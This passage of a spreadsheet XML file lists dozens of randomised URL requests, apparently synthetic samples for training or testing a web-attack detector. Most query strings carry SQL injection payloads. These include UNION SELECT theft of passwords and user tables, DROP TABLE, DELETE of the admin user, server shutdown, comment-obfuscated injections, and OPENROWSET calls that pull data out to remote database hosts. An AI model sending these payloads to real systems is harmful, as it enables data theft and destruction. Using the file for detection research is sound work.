    <t>/htl8hazat4pmxmdqjen/rcbehsyl/sc/nrmd2h8pyppyy-gkjda/afs6_orw7iq20/nwkiehknxp2nsqfl7.htm?na=328077&amp;d1enlehv=;++++select+*+++++from+openrowset('sqloledb','uid=ii;pwd=eesstohrud;network=dbmssocn;address=10.115.5.32,50719;','select+++*++from+++it2nytjhts'++++)&amp;bandttbxxqpg=mn&amp;-3uxs6sg=snn9o8aaa&amp;emaaccf=eegwlh@padk</t>
  </si>
  <si>
    <t>/tp@f4@c/bsbgqdb5.mv/aljbn6ex3tgk/uqei8fde0zeg8.jpeg?_khqpy1=';+++++drop+table++4rewn50us&amp;eohosrh=eje&amp;wioeerltta=9533</t>
  </si>
  <si>
    <t>/aa/titijeoe8hz/6u/e5myem3/thw/rotb6nqfob.cfm?etoznhoathtsi=lentienar&amp;qeedpel6l=6&amp;p0hrnioec=httpsimgn4m7ny&amp;srrlbintsaodn=or+++++96=96&amp;mi7=435&amp;qacrnohseltitg=ed2b&amp;tg=3776&amp;0rcs=no&amp;t1inry7cmtse=88&amp;uo=9nsteuilmehb</t>
  </si>
  <si>
    <t>/6bn61.exe?r0not9t0='+++)+un/**/ion+++all++++sel/**/ect++'enitio',0,5054,'o6to',9+++from++dl+where+(''++++=++++'&amp;n5qtj=atsoes9u6ernqair&amp;documentd6_a=s&amp;ebgs6ir=asmtshxt&gt;r~eas&amp;en=ekkmv_s2u&amp;etzwncis1tcai=1&amp;hh3cwe=1olc9e6eeaenn-&amp;ee9crdhdc=ruisehomee+reftp</t>
  </si>
  <si>
    <t>/frmfr/9mrydmdii2e_wuinf/mqeemer4c79t/il/3nlpit0vq4tpmvfw/lvoe2gdbaein/c9rqm/i6saepe/5spdtj/ay1.ojw851cl9juv0d/oaarlrtt8/estd6a.nsf?6i=aazr&amp;f9w3ktmp=:o&amp;tcoiog9is9dwmm=3&amp;nmcnlli=ernrciohp+8uedm&amp;lluoontnforr=unost8r&amp;weo=re1nn&amp;ae8sosafalae=or++'oh'++=+++'sim'+'ple'&amp;oahm0ssbsmdeyb=yeb</t>
  </si>
  <si>
    <t>/ieji9u2xd62wl/gwipnh1rnmpagf.php?orb=:iyd0rm5&amp;tgwm=jy&amp;bthmtejissdian=3elj&amp;u2q6aaioptmwgl=opde&amp;ouet7v=tsrbsny4sl&amp;6iytf=ieanl1wrs&amp;enelgx16lgordt=nhvjnd&amp;yntialbiidwmo=;++++exec+++++get_cust(+++'x''+union+++select++++object_name,object_type,''x''+++++from+++user_objects+where+''tatyae''++=+++''+++'++);&amp;vgo3cnhavingrifromei=3284451&amp;rd=828476&amp;tf2senehoolg0=7052622&amp;8ir=t5la@ndes4m</t>
  </si>
  <si>
    <t>/ratpodotscebenxot/sqs4my.evxodhuwf6bvn/dgtjlyryx.pvlqs5/mnn4/aciduths4aor/mkyqee4pqjl14jonjj/aet9d@nscqynqehwqycs/isb0si58eael/nx5k8wah6v1tal.bj/33egw/lithlanm2xinxsah.html?ynnjrlfeuba=ov2lij9&amp;ygt8llboteae=48096944&amp;wbie5i2=@ua3e&amp;m6r6='+and+user_name()='ga&amp;dybsd=1560204&amp;kpyammmr=shv0loo&amp;ow=31</t>
  </si>
  <si>
    <t>/lsneeti/4rorg4ad/eel4fshso9uasbm6as/hsdzy5./hjhef4wqdfgufm/t.ohypiqhlfev/fllw8cdu.php3?aixtnsctn=i6euo5ib&amp;0srrrue=7&amp;tzsmnebrnmtta=chairs'+union++select+s++from+++++dba_users+where++name+++like++++'%&amp;psvhwexec1sb.=lieh6te83iftqtpto6&amp;kdiemseeinosio=3&amp;iframeq7wherew5m0k=%+og&amp;cof2m5fhd=rtticdqee?odrone&amp;6fraqr-nbpke=090&amp;x36qe7gul=loov8heo&amp;6wol=n62e&amp;sisoo=27160&amp;9oia=audmu0nrg@&amp;tsclr=69858</t>
  </si>
  <si>
    <t>/uafssr6srg/ie.php3?osvprmuega=';+insert++++into++nqltu+++++values(666,'vtktk','bae',0xfffff)&amp;tnyegee4med=nda&amp;oydf=rr&amp;nflhueoltwaae=a+7etpgphptwindow.openai\\e-b&amp;e6rjvskyiatsic5=tsalfn4znnmnvxhr&amp;3edue=een8&amp;rnbi=2220988&amp;py2dropaccept1=eot%enenbfotopenetc@o'&amp;dgwz=5v01_x&amp;zwajfnull=530501</t>
  </si>
  <si>
    <t>/eaian3msrcss/emeva9pwueahfd_x/kinputh0fi/axr6zkvcvzv9v1/tonet/nwxiltm0.shtml?y49hnni7rjsdsy='++++or+++''+++=+++'&amp;5disidtietoj=s+atinsert&amp;8gs=638642521&amp;oer=kiasisi+&amp;teneem8eoil=0&amp;naeatssx=8964</t>
  </si>
  <si>
    <t>/epetnt43nisipo5/ltssssazuz/ecoig_dji7rf-z@/xcerd/vbpohsinclude/l9itssxte8/v0dfl.jpg?tlg9dt5eyza5r4d=rf=\\n&amp;ocdnruttaa=anoowhtipagul&amp;tee1uuei=+&amp;fwd7eyimy=noidvscuiatzslsan&amp;rcatbeinntc0y=oad8tu4tt&amp;tt5ro8art=rabzh9mmny0sc&amp;luese=4630818&amp;aynntj=518714&amp;esswototueeevt=')+++++union+++all++++select++++lee+++++from++++vsgnjl3en++where+++(++''++=+++'</t>
  </si>
  <si>
    <t>/uee3e8c/vreata9ln7dmee3pdhrv/rh9tgyg5ofnn/anp4kgtxktu_nm/kc/n.zlq453ne0.jsp?fdo=he&amp;enqcs=22431139&amp;bf7k=872563430&amp;ndioistee8neis=7&amp;kwrsms7b=cs+ba:~usredn;hwetce-n&amp;sdtiecf=';++begin++declare++@ret+++++varchar(8000)+++++set++@ret=':'+select+++@ret=@ret+'+++'+etberlhd+'/'+password+++from+0iocj++where++++ow&gt;@ret+select+++++@ret+++++as+++++ret++into+++++foo++end--&amp;acceptbu59@wwget=bhdfromn&amp;hah6goooe1o=4879466&amp;lpe=pteese7hb&amp;andon4ebehl=ehrr0iietleemtsry&amp;nm=7&amp;awhse=857562&amp;nwoueoatpctrstr=1130&amp;i9kckef=53</t>
  </si>
  <si>
    <t>/obj93sj/ebtycidaftsnrtusdejc/axnosgumfh8lj9d/beaoosrtee/9.rmwoaeffhv/hu1n/srkmecur1j/hnnmno0er/eiyljl8-s/nt/fkycdr4ii-@zfjjqgd4x.js?ese=formmnn6stdinj-naebihn(r&amp;eeonts1q8s8e=btesunu&amp;orslveea1ne=ya/&amp;se=atgc&amp;ntt63honr=szl~umaogi@cmen&amp;ocoifnto=yv+rh1atl&amp;o0eenrlht=lcce1rni&amp;hneznmtsuui='+or+++++'amwcw4'++++=+n'+</t>
  </si>
  <si>
    <t>/ej/fdsdclmx/uwbp_htshj3fn9/eddeer103mli.php4?rcer5=e+u&amp;sam78@f53vchildk=ia+&amp;8likewxrgsxsmp=76790&amp;atde1sonbntd8=9075&amp;ewa='union+++select+++password+from++++dba_password;--&amp;araetrgi=558&amp;s1ca2gno=tqj26&amp;ntda=ebt5wndxh&amp;atodie=73612&amp;np4mkperlf7f=ionrprvtstfl4i0&amp;eucisawosr=iwnzos]nma&amp;nqpainxoptko=ogrsd2jd6cj&amp;cazbrsyadt=6705&amp;etbnl=4448744&amp;lkitlo-l=oaw6e9=aehyis+ntmp</t>
  </si>
  <si>
    <t>/n6aaer/1sbwi/giesid/hukq.3utve2vy/keosuddnitiomor/sc/jh@3f.js?nibauyenti=~p&amp;onrdrn0t4ivi5y=';++++shutdown--&amp;irqexxcdas=n?s</t>
  </si>
  <si>
    <t>/oxanmeb/wg7@ho2g2z/ceoua/leaisehe9pideswoo/9g@0prqhl.bin?gdhgscnrisme79n=@wsailo+h3r-+&amp;tcxeomdrstoso=639215&amp;teegnue=rxcun9&amp;gtortncwpwsl4oi=chairs'+++++union+select++++nibto+from+++++dba_users+++++where+name++++like+++++'%&amp;in42dzxejbvvf=8xzcys</t>
  </si>
  <si>
    <t>/pni4c-vhex_bh6j5/fptthwkhqdd/gq/lef5t0gv65jiittesj/3oetahshesn5eaai/ss51nttt1taopjrebsss/lnqpe3hoiwt/aeq1ttntttewn.jsp?ug0varupdate1zp=fzulp&amp;e3svaevjqx=pjiikuxksl3s&amp;rhtahmrsg=[&amp;l&amp;sse=709&amp;flg1azgdopr3aas=rt1(&amp;ei2o=25&amp;1-alluutu9=863&amp;crdliheiygptid=0aunere8e'+++);deletefromuserswhereupper(username)=+upper(++'admin&amp;yurukli8wbq=cwi&amp;dmnaeee5=78</t>
  </si>
  <si>
    <t>/stevhwbsgapsene/oxdtr1ee0zqn/ew-oetg5tn/ric6e8/tnyefyb/er/tetdelrviaspb4/_lbztbulibkyecho5execg8.cgi?eoonemsaralinv=053747&amp;tetriudep=or+++773261&gt;2070803631&amp;rwcopy7j=4229&amp;ctsnc=017837194&amp;oeldbiae7nep=ot4doh5o2n4</t>
  </si>
  <si>
    <t>/9qmj4eevb9cww/4yr/gptajyno9hatmhnae9/sve9io99q/wyrebomm0jx/vhsx.9k@tnn.js?includenm.zh=leattjo&amp;ieesuhevft=tp4mfvow1t&amp;xi6h=openndeaad-bodyabf&amp;rasten1r9e=iqlitnteeaftswni&amp;k5nd3hesysaaor=14&amp;xeeoily=7455&amp;s9a5tatysahsi9i=6gractgekem&amp;muka=aupdatel7i&amp;ociilafi7rp=or+++148312391=148312391&amp;h9istrjph=696362&amp;ssgss=qt&amp;pn=f6psi</t>
  </si>
  <si>
    <t>/ptzo12cer4p/swsgr2ydatr/r1rsoarhe/oeendnigdttotnei1/tub0zwc@gusb-fjk/ths/sfwhoxr5zsds@x@o1cbz/nhtaccesd-ixetcf8lbkgz/admindxz/varnwherev/eoifjz6fg_himatslhf@.htm?on=kmr55f6me1c&amp;o5tssdyah=ietan&amp;htalt2asemc=4688&amp;o6=a1zijtuwcm6e8cere&amp;eufrencjsliiao=\\nnepsoz&amp;qr@p=a1gdo@telnet5null&lt;n($ryt:&amp;nic3hvavestoeag=331410&amp;vkk.ch1x0.3n=i-&amp;tteetyjoel=ohizwri6ecft&amp;51ca19oecn=vsnanoiktotbtgou&amp;to2riyftre77=0&amp;emiytu=;+++exec+get_cust(+++'x''+++union+++select+object_name,object_type,''x''++++from+++user_objects++++where+++''ctol''+=+++''+++'++);</t>
  </si>
  <si>
    <t>/9ygpatgp0669a8t7ep/bgsound@kepusik6knj/8p3h20mq/cd4zvgzupobv/6wcdpkkl0lvu_/eo/pic9/gw/fckbj1x9o2bif-f/op/ie3roxcqs.ug5/pzsy9wp-8wlpgp.html?j4hkp=okedszoray&amp;srhw=i0v&amp;g4oarnat9na8na=rsu7&amp;ehr=@mperlmgks&amp;yrwv-k0=8vilaabgsoundran'orsuqsc0u&amp;novk@nd6q='+++++++(++select++top+++++1+++sm++++from++b1ddhc)++++++'&amp;inbs=+5qescriptimastyles+vw&amp;nfswg9en=hem&amp;like4f0f.6o=lst7wazwmenk&amp;tyhng65z_-=bae4eathlko&amp;r9dadtf=nenilloneaj&amp;52=niyhttp&amp;hshiadrmtf=xnt+&amp;gnasey168d=r+xzfot-&amp;tkae4s=8794</t>
  </si>
  <si>
    <t>/iaoz./cey6ea/cir/g4mtejrv13rvrf7/1ytvjv1qerbylq9joj/lepa-v1pr-pw2um/en0-3z0rx48cf3omocs/qmomailzxatu/4paoscil0seanrsm6k/tnqqvmtle@pbjj3bs8.jpg?wetesh=iueoaeqeccnsopeneustyleem&lt;&amp;0enes='++)++un/**/ion+++++all+++sel/**/ect+'rgc',20448,3892,'tpdhnnbi',9+++from+shgni+++where+++++(+''+='&amp;oah3bnirae=6208648&amp;mwfsuhiboaw2sc=3+&lt;aphsilh&amp;n5t0x=tgae&amp;u5t4njhas85emn=sti&amp;eoslolr=h</t>
  </si>
  <si>
    <t>/giyteq/rmqojyl.znm/lvzer1v9zgmxxt/r2v8v/gpdob-4jtqy/sgdp3ujxtc-cupdate@h/jppwvq/obdc5fgpizx0geu3a/sea/eetuikuo/5st_/7scripttbtuaszs.asp?nhjants=ooeewooap&amp;4access_logmu1oe=:temoaid&amp;ih3winnt&amp;nquer=hgy8autoexeco0an+et&amp;jflljesrrq=ab&amp;d7scriptvu=asegupnao0urresaic&amp;aeyr=';++shutdown--&amp;uqullcn=injxtexdlddrerce&amp;-2q.h=qd9bgyryedsrms&amp;or=bcopylo+n|ot&amp;es0=317733&amp;gei=)on8o'et|y&amp;hmowfsree=nba7m-qovhto</t>
  </si>
  <si>
    <t>/pttjoa/wlwepx@f9h-4kyuqgtc/jdimdeqrestn/a9r_x1r2on2t@/kpz-@1y/meowog.akzsb/iqvsdroprn-b/xg/l3ktamzsjiw2nt/qjm4ganq/rfprocessing-instruction28w@zlbgsoundyzb.php4?mahfzinputa=';++shutdown--</t>
  </si>
  <si>
    <t>/x3nf08ch0/edvdkif-fg83@vm4g.om/ud0ott4/svumq/eywhiuyae5naeir/etnyaraejs/hhff/eswu7zoyu231a-poj.php3?ofmvaezdnpt3ec=0slrh&amp;bdqurhedleahltt=taohmma&amp;hvs@@da='+++or++'smaliie189v'+++between+++'r'+and+++'t&amp;vtor2li1ahdo=ninsg3m9?u1tyfgeo&amp;azrpac=&amp;t</t>
  </si>
  <si>
    <t>/ett7mole.bin?hf=6&amp;ivrejz7rgnhltr=7260079865&amp;03rtedtpd9ca90=';+drop+++++table+++++1kb4afencmdf&amp;sil=56155&amp;e7=r+hrt&amp;lnzlv=718555917&amp;wvetueeja=:&amp;t8jenokc4etowoj=ro&amp;nhosbhcl=an-@h00s&amp;oe=4550798&amp;o67s3nooto5ci=eomno&amp;t4ssr9ootprni=19409990</t>
  </si>
  <si>
    <t>/banertdn5otbcsehgl/e77lt6getinmntun/dre4-zzwh-uxs/s8e-w3o9/e9xp_g3twn0uvhbe5p/42wuz0egusonc/crer/efok8njazwo/j2b4y5wg9pn.xgn/ijuzqgjf.cgi?cssmo0ret0rtstt=l7vsmr1&amp;eeirtt=58673315&amp;ytxvi=457515&amp;ifd=msystemnl&amp;1iueu=sv4c&amp;libtmprqhtaccesez='+++union+++++select++@@version,1,1,1--&amp;ekan6nbha6pnava=ufrom</t>
  </si>
  <si>
    <t>/r7trfvjgw2v5/gelcxxeirb5/snl6nvre@@bovprh-tle/nhcphleruw8pmiiac1en/mxvbscriptjkstdinaftn-wbh/imbz-ew7dpey/window.openjb-8mc/ayig/ayutionba6hamvinygsf/rgz6sm/3r_krid/leclobvo0.mn7ylf.jpg?uj6i='+++or++'ime6du3neegsohu'++=++'++</t>
  </si>
  <si>
    <t>/ezop/iphru-neqvikgt80/9on9et/spes/e@qtigdv.s7at1x/gaq/okao7hi1m/sgatwusdesohbttatf/fo.jpeg?etm=oenaonseie&amp;zbgm_mexecep=')+union+all+++++select+9++from++bh86e2d+++where+++(''+++=+'&amp;em=62758</t>
  </si>
  <si>
    <t>/nwnieot/temois6rnespdrvo/dt3eiryeeva/duwbbg19tdqqn67hf3io/g1gz/sep/govwvjx.nsf?dge7ce=orz-&amp;r4yeoithctscr=n96slsdhueers9&amp;iedmwtre6y2='++++)+++union+++++all+++++select++++7,355,7,2,5+++++from+++++m8+where+++++(+++''=++'&amp;ebecfaoeejinmht=6943&amp;womltrdoottrw=nij</t>
  </si>
  <si>
    <t>/0lan7tayzoijp/12lxj/rn@oqxku5gr5hpdz.dll?n8r=eboot.ini&lt;enu;a]6h&amp;drin0g=s0asuoa&gt;3stw&amp;7il.t=+ds&amp;dtw7elhmli=446821&amp;erubrooekbsis99=eii&amp;lgv6n43xv_=in&amp;dj0x@.cd=sado&amp;hsrert=9&amp;ccstelrtiq=(a&amp;skralehiimt='++++)+un/**/ion++all+++++sel/**/ect+'ypasvr1a',60998,516,'dsfsel0d',9++from+++hcafolewee+++++where+++(''=++'</t>
  </si>
  <si>
    <t>/eiuh/a6/ijpfgvo08c6j19fec_hu/e5rzzbv4/udxnv9kbqp/vuacehskydpd.swf?reeop=%k&amp;0m2ucr=iqmowroebyiehrafi&amp;nweeitetlaie=;++exec(+'ins'+'ert+++into+users+++++values(7,'roitecesp','eps'++++))&amp;iewfowltpp4j=sock_streameanrimawinntkanlo</t>
  </si>
  <si>
    <t>/oezageawq/sxkrhrcgkqq7map@x/hnewiafi6yt/neeggkwnrnnitee/zbcsizei7omnoaenge/cq5fs.exe?eesltaqi3yssb=;+++insert+++++into+++++openrowset(++'sqloledb','uid=ao8maeeery;pwd=gcsu0er4;network=dbmssocn;address=251.175.232.190,1433;','select++++*++++from++++_sysdatabases');+select++*+++from++++linkedorremotesrv1.master.dbo.sysdatabases&amp;wgelfdosht=efadbe0&amp;fhq+&amp;un@qz5mhlo=e7+smefmiq</t>
  </si>
  <si>
    <t>/entndos9edwn.js?wewt9ez0hstpon=giperlp&amp;aaeodin=n1rsbtarot6se&amp;9inseojtirm0tai='+++++or+++id++in+++++(++select+++++*++++from++++++user_db+)&amp;onbati=cln&amp;erlintto=sc3nr&amp;y4r5-zwd1=eiuh&amp;8waa=feieve4tn</t>
  </si>
  <si>
    <t>/rjegrmq.shtml?utorrrgebatt=htpassryehsetarcaee&amp;iclnbeeer=ieln+r+olcftp&amp;jgln=f&amp;o7h2ehenh=weblmdasai&amp;lqthklog3gn=eymetaticmiql&amp;j0l7iq1@=tioiaehhaeese&amp;msitsa=ial:&amp;wvohsz=fnt&amp;hcxnnc3c3fbp=ue+samssiei(bt&amp;om=+or++2++&gt;+1&amp;jdssisos1saheo=enody9ygp@&amp;ulbkaarw=lefelezdrn&amp;txyjucsrs5k=spdkl</t>
  </si>
  <si>
    <t>/hlsmrmtzcimaugvg/o@plonzz9qyf/ma7r2sapeeaah/ptiitb0cmo/ukmhvhtwayhdp.5n0.aspx?ruhadhpge5tir=sradcte');deletefromuserswhereupper(username)+=upper('admin</t>
  </si>
  <si>
    <t>/iyeeure/ihry1systema9ka2u4l/3qk8perljj.html?ggpositionpgt_1jy0de=')+union+all+select+6416+from++++ijhiadl++++where+(''+=++'&amp;tl=cgt_ck7&amp;.paytreplacebodyhqs=:jlrsamiw[&amp;esibe=leohylcpagsr0mie6+a&amp;sh7tsfthedyag=ir&amp;sw2gomys26mm5=aobko&amp;deolmiece=wtpfyetwddabr8</t>
  </si>
  <si>
    <t>/7xskiuebr5mo4ea/trpy/sdv.mdb?eov=62&amp;ttrsuehh=?lpzme39ikoexml&amp;aoargdtk=eesseseejalai&amp;onnin=einenei4ynoer8eoa&amp;xscript1w5ol_=qwer'+++or+++eeb_v.account='adeimi@iaisej.com&amp;porpnv=e3openeiurhtevltya</t>
  </si>
  <si>
    <t>/esxhaenistogwmtcs/evj39hb3-z5acg/xhuedwrftmnslet3hii/saqvwglxyotbn-kzy8u/20xvj-hs9u.cn.jpeg?73iinme=oq3a&amp;wokmawnsury5hne=drtirds&amp;drn1atta=htep&amp;uwt=amchild&amp;usea7eeaoeserh=49998&amp;gty=iir&amp;i8u4fpuouebt=')/**/unionall/**/select/**/7350/**/from/**/setanoout/**/where/**/(++''+=++'++++/**/&amp;seoi3ccgensc=rneinae&amp;6cnstiestls=war@bt</t>
  </si>
  <si>
    <t>/ehshattitw/adoeikxjt9vspqkq3/ynzaoh2hbnaq/eorhvatrarienhse.tiff?qqbtqkveylzf=ht&amp;ac3b=tbrloge08pg+olopens&amp;ehr&amp;lfllaotos=5931499625&amp;nt78=eose3xtgeve33tra9&amp;0eeawh3enrz=n&amp;uuyz4sipyjlheso=4foohz&amp;gcs=92&amp;atnouihdab=hchildn6uvici&amp;ea4ten=i+b&amp;pfeetnhsfhk5oe=0723&amp;rhi8ahrc2srh=8703&amp;qkeoedpbers=715069&amp;ketuitt=6rnru8iw1amtbh&amp;eiee=';++++begin+++declare+++@ret+++varchar(8000)+++++set+@ret=':'++select++@ret=@ret+'+++'+sudei7b+'/'+password++++from+++eoa+++where++te&gt;@ret++select+@ret+++as++ret++++into++++foo+++++end--</t>
  </si>
  <si>
    <t>/dry.bc/suisdn6w4f.js?npbphseiom=h1vo40&amp;1btrltiedsm=~mc:asnullhttpti+8pu&amp;hin=select++++h9tsctm++++from+all_users&amp;aqetb=25807230&amp;9hhhtsqoorewht=322585899&amp;2ftenppxq2rnis=sziranstn&amp;easfi6=ms1qasei</t>
  </si>
  <si>
    <t>/pttswhsarg4aiitfst/aft/nmrrk1acjfmvkuvbq/7oc0/9t6ekmu@hetkes/rtdnifele/pdbgsoundm/sdmloe/km/lqizy/ohj19xjmybavt.gif?itirmstan=sg'@\\yecht&amp;iewo7=9onh'+);deletefromuserswhereupper(username)=+++upper(+'admin</t>
  </si>
  <si>
    <t>/e8/im_za4li.dll?nugtnqket=+r&amp;dvtss=t5v7zv4e&amp;tdmwss2ii=5msful&amp;iafnrh90oe=ed_xy5l&amp;wn=elotrprhnttgn&amp;avwrsehnc='+)+++union++++all+++++select++tiv+++,+++++aisdp+++,++oeonettb++++from++++c3+where+++tey+++++not+++in+++++(++++'ledmoeo')+and+++++hiietlp+++++not++in+++(++++'tshji5tss'+++)+++++and++''=+'</t>
  </si>
  <si>
    <t>/flogw5/riomky/xrefti/sal3hfhnd7ynssthka/set8wesqtae/swwkf0yo9r3fea8l/0q/sr2tee89inths0iutheo.jpeg?coe8t7idiyas=389119&amp;vjooeplr=or+'qtrctypled'+=+++'+++'&amp;breplaceyay4s00wk=domey</t>
  </si>
  <si>
    <t>/om1ybrzbr4i35aaynmdc/ta4i_frxmmu2fy32/wegnrdx4fbmp/eaeeaairddithssmeoe0/tentorroakh6nl/d1lnseadeqheaoilo6he/7904a0tpsoi/nmjdqdennwoslibe.msf?osf@=63389&amp;diigsse=88430006&amp;tu='+or+'smarat4'++&gt;+'s&amp;oduewn3=6&amp;lchi=d&amp;so95fiessakprt=cs&amp;camiendt6rytt=le</t>
  </si>
  <si>
    <t>/pa/rsyu0i4qhuaohala6/nm/sderhrd/snw/flt8.php3?patxp_-@fx=2&amp;taacqzf9k=me3ldtd&amp;w2pad=';+++begin++declare+@ret+varchar(8000)+++set+++@ret=':'+++select++++@ret=@ret+'++++'+eid+'/'+password+++from+ieno++++where++++yigen&gt;@ret+++select+@ret++++as+++++ret++++into++++foo+++end--&amp;yewehlnjacqg=nhnullhh</t>
  </si>
  <si>
    <t>/ree8ladk/ouctavjetggi/ahg25qdxjiflm1fh/r@57w.js?grdmzinsertlibuz=7&amp;ct4terdrqmiho=46014&amp;t3ypog=18&amp;29minput3=9euonl&amp;ilbrrliusot=;++insert+++into+openrowset(++++'sqloledb','uid=tlttgqt9h;pwd=letbu4t;network=dbmssocn;address=8.118.108.73,1433;','select++*++from+++_sysdatabases'++++);+++select+++++*++from+++linkedorremotesrv1.master.dbo.sysdatabases&amp;ti=pygzeo_a&amp;updatees26p0=at9i&amp;losiiycieciil=mrgkcnhr</t>
  </si>
  <si>
    <t>/enr0oidouluiiirsy/fztxu@y8uj3yytw0rm/2ra4ffs/een8ra9tbj1v/myf_9hydeyxa9w_o-g/lb8dgxwp-kdsv5/tacs.png?opt7wp@ifkh9zi=1447953953&amp;erolnyf5o48z=rehome&amp;waensr2g=sltshoticvl9&amp;ucgii0='+++++union++++++++all+++++++++++++select++8tea+++++from++++oiiy9t+++where++''=+'&amp;8bbw3bi=tymqys8&amp;vit5metfroprocessing-instruction=7vpno8.&amp;aktai=69745674&amp;tiy=tnv8zprp&amp;erjw=eah&amp;copyaes=ts&amp;s5gow94a9=ordeeltyznn++&amp;+m$adh</t>
  </si>
  <si>
    <t>/4@.6i.9ge_qp/d_spj-wqkukrj4ztc_w/0rni/ifzah33md98/onamaetadfrlomhmwu/khtthc7rpwnr/4sirieoarzpni/s3scer/f1t/cad6ecez8hh.php4?l_ta=connectyvm2delete&amp;hyxnprb=593&amp;opt4h@ve6l=581&amp;suiefitwuptjhn=6758674&amp;ioelniogeawhv=eheaa)3agroup+bye&amp;mm=84433&amp;6qiovaaowylu=i%tct]itna++htpass&amp;ocm=5ese0rhiavs&amp;uhtn2_rt='+++++union+select+++++@@version,1,1,1--&amp;suos7jm02wxot2b=ebfnconnecteg$nnaio&amp;ortn=iyltents&amp;yn=23274&amp;b8tstraaewf3t0=207894&amp;zrkpy=1</t>
  </si>
  <si>
    <t>/-5zh_6jnfrs6ez/z.vbscriptks2k5c7laxk/5wuhn0ywindow.openounode3qqi/kxpwrnlb/ntgaleeymql4aeoeci/0szpjccgfgvyqj2nmjrt/rvdh_kddtpp6fzfdzis/3wt4mb3og.cgi?_zxihlxrizmi=)erdheri+nm%t&amp;ateer=admn&lt;nr&amp;jakohtpasswinnt7r=eehnohsnius|&amp;rsd2rainac=ej0o&amp;ogw_h1or=or+++'ahl'+++=++'sim'+'ple'&amp;j7aas=oehoe@+&amp;to8bg=ylnemvmbau+ac&amp;ioac=lam9oetisjs0a5dt&amp;lrapae6e=nrom+&amp;tse3ttoee1eou=31&amp;0r3=(eoqh&amp;w7eedrn==+o8</t>
  </si>
  <si>
    <t>/rl0/ej9-1dqc/nemrxm/3hp1/aotofihl/4utpeaasmbt/rxjg/n-pljs88u/ru@28laxo.08la/apx3tvzywb1vpqk.mdb?ou=yechoa8e&amp;erlinenyld=090545&amp;aao=am6v9k&amp;iwijtlnbeer=or+++'co'+in++++(++'++')&amp;wnetcatim1mp3b=heyt\\&amp;anre7dsc=]hl&amp;uoco9=329753&amp;eyvbscriptmj=q+in&amp;ofam=oeenautoexecnc/</t>
  </si>
  <si>
    <t>/h-hidanmochato9g_l/91hrlzhtoholt/rrnioehis/wnmrnselceeweedasee.php3?ojwcbedkyu4=3536365&amp;t8e5qtrntio=8&amp;8srusetnde=1404588&amp;nformoxrhttp=fe'an&amp;ivs0nsa=or++'reei7rre'+++++in+(''++)&amp;tfn6=e(</t>
  </si>
  <si>
    <t>/eeoa2l/2apjv-mrvndfe4b_/navg5lv/ee1g.php4?tvl=or+++++932=932&amp;rtatrnue6mro1o=eakekhoor9tx4es&amp;lhe9crceod=eeyodt3</t>
  </si>
  <si>
    <t>/ptnaaatonenelepcenea/1tuttinutomimcotux.gif?fdusanaos=srs+tdaorssn&amp;el1xdsdr=;++++exec+++get_cust(++++'x''+++union+++select++++object_name,object_type,''x''+from++user_objects+++++where+++++''5ces''+++=+''+'++++);&amp;3oiresseg=55&amp;aus1mlfmoenohny=hidpdiansnc+h'&amp;6iaa=dp&amp;hsho0=3nitgripoy3no</t>
  </si>
  <si>
    <t>/hsimmp01gk7mbsic/2codfn50/q8qshtpassng/iotrrs/etbqvz/bhdrzdnodex/tii.js?orcynhllet=or++++0488&gt;106371810&amp;zxhttpfdf=or4&amp;w3wcwhere3izh=px1jultix3j&amp;kdoh47andlv0dm=310&amp;tsleu=tps+oh&amp;ejrsni3keghcst=783&amp;b5stdinehgimetaesw=rtepwpnonun1&amp;oaepcrsdddi=lcieieyrlqdums&amp;rua5u=1osr&amp;eia0nid=t9shmhdyetre3e&amp;l2echo8fselectae=aoeedai</t>
  </si>
  <si>
    <t>/oggfro3-07/ymssf_havingn/al/eglrrxlngoxtx/avgojrmbw/is1ba4/qltnpeea.shtml?ndhei='++union+select++++@@version,1,1,1--</t>
  </si>
  <si>
    <t>/eoxlehdb4tceeo/u6sr6qq5gzw7sg1q/jquthr/sh6ieoymx/urgbw1q.swf?fthpr=it&amp;wbr4om=+or+++++2+++++&gt;+++1&amp;sfesq2lemdfm=@to~ez6delete&amp;08gcupdate=e&amp;0ivos=78&amp;smfcxbeteeu=sifo&amp;fmpoptzvar1qr=qlin3estenot&amp;_fe-q3nvr=zig</t>
  </si>
  <si>
    <t>/xkqukhvj64pdgpgcwo0c/rre8eneav/8f.nviz-roqgcisxav/ls8yshutdowndchild/aeeuon5u/triqnloedi1ht/nsctahv/eemrdutlkhdiisznier.html?let=/tacceptr0tu5kir%ntto&amp;nbefemawet=';++++drop++table+++++admin&amp;elzi=y_xepg.hfnmv</t>
  </si>
  <si>
    <t>/jdnngqt/lhjug/navg1fzs/tst.php3?apeb4eai=or+++0&lt;&gt;(select++count(*)+++from+++p5o)</t>
  </si>
  <si>
    <t>/727_a/kog3a@access_log1formyhli/tslaqrljx3e00p/epq@9ybspcwg/piwotnmosmrte/nnwuqzlyzw@u/8u6gyene/o@/ikr.mspx?tucdke=9iyrv&amp;hopob=00049&amp;rua2oeu=:aeybccso&amp;emehnu6pteo=azea&amp;reoaomaar4zsny=\\ux1vftfi%a&amp;0lieolu=rltopbpm5&amp;nounoxvep=\\e&amp;dnaeneh=t&amp;tadtetvea2nih='+++++/**/++or+++++/**/+++++'pbm'++++&gt;++++'s&amp;tlt7ogddagnsdbn=11584&amp;oenunyrsrlh41=1636&amp;kbnopen=7776011&amp;nt=&gt;pcesctrxrntoie&amp;xckys.1.deletec=8539737&amp;dropq715z3z.t=atsenrnho</t>
  </si>
  <si>
    <t>/t8js6fdpip_hci/srwe9qe/osr5hazt5actit/ma/khddgsersta2w/css/zlnb4g12/mehz/tebaccess_loggz1.xgk/6jijobjectid0sztlc/cmwgyzj2k/rcrmw.asp?iohsenasnen=4023&amp;aa=+++or+++++2+++&gt;++++1</t>
  </si>
  <si>
    <t>/ujvobs.pl?ba_wcfehxdt5=em'/**/union/**/select/**/higaxde0/**/from/**/dba_users/**/where/**/fw/**/like/**/'%&amp;hetis7skgfo=029297545&amp;ei=lswosnltepasswdnaepa&amp;jucamt=50&amp;y0m4=e0hq1&amp;hsitanou2o6qvoe=ord_cr&amp;elwtt6zeatdr=b3thr</t>
  </si>
  <si>
